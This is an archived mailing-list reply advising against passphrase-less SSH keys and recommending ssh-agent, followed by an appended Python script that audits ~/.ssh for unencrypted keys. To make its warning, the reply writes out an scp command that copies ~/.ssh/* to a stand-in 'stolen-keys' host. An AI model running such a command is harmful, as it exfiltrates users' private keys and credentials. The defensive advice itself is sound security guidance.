Mailing List Archive



Re: [tlug] Problems with scp anyone knows?



>>>>> "Scott" == Scott  <scottro@example.com> writes:

    Scott> It'll ask for a password you hit enter to leave password
    Scott> blank.  It'll ask for confirmation.

Bad idea.  This is even worse than leaving a key in a little magnetic
box stuck under your car's bumper, since it's trivial to do

scp ~/.ssh/* 'craven@example.com:~/stolen-keys/'

and the cracker can use your id without ever leaving the comfort of
home.  Use a password, and then

$ eval `ssh-agent`
$ ssh-add

Most modern distros will automatically run ssh-agent for you when you
log in or start an X session.  If not, just put the above in the
relevant rc files.

    Scott> I only use this on a few boxes where I'm going back and
    Scott> forth on an internal network and have no idea if there are
    Scott> major security implications with this method.

Now you know.  Unless physical security is _very_ good on that box
(i.e., start by installing a coffee maker and a urinal, so you never
have to leave it), your network security is near zero, and that's a
permanent loss once it happens.

Even with the ssh-agent, if you have to leave your box unattended for
more than 60 seconds at a time or so, see the man page for ssh-add,
specifically options -D, -x, and -t.

If you use PGP/GPG as well, there's something out there called
"quintuple-agent" or something like that which will manage all your
private keys and knows how to deal with all the different protocols.

-- 
Institute of Policy and Planning Sciences     http://turnbull.sk.tsukuba.ac.jp
University of Tsukuba                    Tennodai 1-1-1 Tsukuba 305-8573 JAPAN
               Ask not how you can "do" free software business;
              ask what your business can "do for" free software.
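
An added example, not part of the original message: a small audit that reports which private keys in a directory such as ~/.ssh are stored without a passphrase, the condition the reply warns about. It assumes the OpenSSH native key format (cipher name "none" when unencrypted) and the legacy PEM "Proc-Type" header; the function names are hypothetical and the sample key header is constructed.

```python
import base64
import struct
from pathlib import Path

MAGIC = b"openssh-key-v1\x00"  # header of OpenSSH's native private key format

def key_protection(text):
    """Classify key-file text: 'encrypted', 'unencrypted' or 'not-a-private-key'."""
    lines = [ln.strip() for ln in text.strip().splitlines()]
    if len(lines) < 3 or not (lines[0].startswith("-----BEGIN ")
                              and lines[0].endswith("PRIVATE KEY-----")):
        return "not-a-private-key"
    body = lines[1:-1]
    if lines[0] == "-----BEGIN ENCRYPTED PRIVATE KEY-----":  # PKCS#8, encrypted
        return "encrypted"
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        try:
            blob = base64.b64decode("".join(body))
        except ValueError:
            return "not-a-private-key"
        if not blob.startswith(MAGIC) or len(blob) < len(MAGIC) + 4:
            return "not-a-private-key"
        # First field after the magic is the cipher name, a length-prefixed string.
        (n,) = struct.unpack(">I", blob[len(MAGIC):len(MAGIC) + 4])
        cipher = blob[len(MAGIC) + 4:len(MAGIC) + 4 + n]
        return "unencrypted" if cipher == b"none" else "encrypted"
    # Legacy PEM (RSA/DSA/EC): a passphrase shows up as a Proc-Type header.
    if any(ln.startswith("Proc-Type:") and "ENCRYPTED" in ln for ln in body):
        return "encrypted"
    return "unencrypted"

def audit(ssh_dir):
    """Return [(filename, state)] for every private key found in ssh_dir."""
    findings = []
    for path in sorted(Path(ssh_dir).iterdir()):
        if path.is_file():
            state = key_protection(path.read_text(errors="replace"))
            if state != "not-a-private-key":
                findings.append((path.name, state))
    return findings

def constructed_sample(cipher):
    """Constructed OpenSSH key header for testing; contains no real key material."""
    blob = MAGIC + struct.pack(">I", len(cipher)) + cipher + b"\x00" * 16
    b64 = base64.b64encode(blob).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"

if __name__ == "__main__":
    ssh_dir = Path.home() / ".ssh"
    for name, state in (audit(ssh_dir) if ssh_dir.is_dir() else []):
        print(f"{name}: {state}")
```

Any file reported as "unencrypted" is usable by whoever copies it; a passphrase can be set on an existing key with ssh-keygen -p.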

